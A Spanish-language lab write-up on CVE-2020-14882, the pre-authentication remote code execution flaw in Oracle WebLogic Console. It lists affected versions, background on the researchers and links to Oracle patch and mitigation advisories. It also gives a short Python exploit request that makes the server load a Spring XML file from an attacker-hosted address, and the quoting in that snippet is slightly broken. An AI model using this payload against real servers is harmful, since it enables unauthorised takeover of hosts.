
Toma de control de Oracle WebLogic Server
CVE-2020-14882 es una falla de ejecución remota de código (RCE) en el componente Console de Oracle WebLogic Server. La falla de preautenticación recibió una complejidad de ataque "baja" y fue destacada como "fácilmente explotable" por Oracle, lo que resultó en una puntuación CVSSv3 crítica de 9.8. Una explotación exitosa permitiría a un atacante no autenticado comprometer el servidor Oracle WebLogic a través de HTTP y tomar el control total del host. (Más información - Tenable)
Las versiones compatibles que se ven afectadas son 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 y 14.1.1.0.0.
Víctima (WebLogic Server): 192.168.0.15 - Windows 10 PRO ejecutando WebLogic Server.
Atacante (Archivo XML alojado): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Este payload llamará a una librería XML de Spring Framework para enviar una solicitud a un servidor en el dominio del atacante buscando el archivo teste.xml.
El 28 de octubre, un investigador de seguridad llamado Jang publicó una entrada de blog (en vietnamita) sobre CVE-2020-14882, incluidos detalles parciales que podían usarse para un PoC. Jang no es ajeno a las fallas de WebLogic, ya que se le atribuye el descubrimiento y la notificación de CVE-2020-2555 a Oracle, que parcheó la vulnerabilidad en su CPU de enero de 2020. En marzo, Jang confirmó que CVE-2020-2555 no se había corregido por completo. El bypass de CVE-2020-2555 fue divulgado por otro investigador, Quynh Le, del VNPT Information Security Center (ISC). Tanto Le como Jang recibieron crédito por notificar este bypass, identificado como CVE-2020-2883. (Más información - Tenable)
Oracle WebLogic: CVE-2020-14882 : Actualización de Parches Críticos (Doc ID 2771503.1). (Soporte Oracle)
Aviso de Actualización de Parches Críticos de Oracle - Octubre de 2020. (Soporte Oracle)
Cómo Mitigar el Impacto de CVE-2020-14882 Weblogic. (Soporte Oracle)
Vulnerabilidad en el producto Oracle WebLogic Server de Oracle Fusion Middleware. (Mitre - CVE)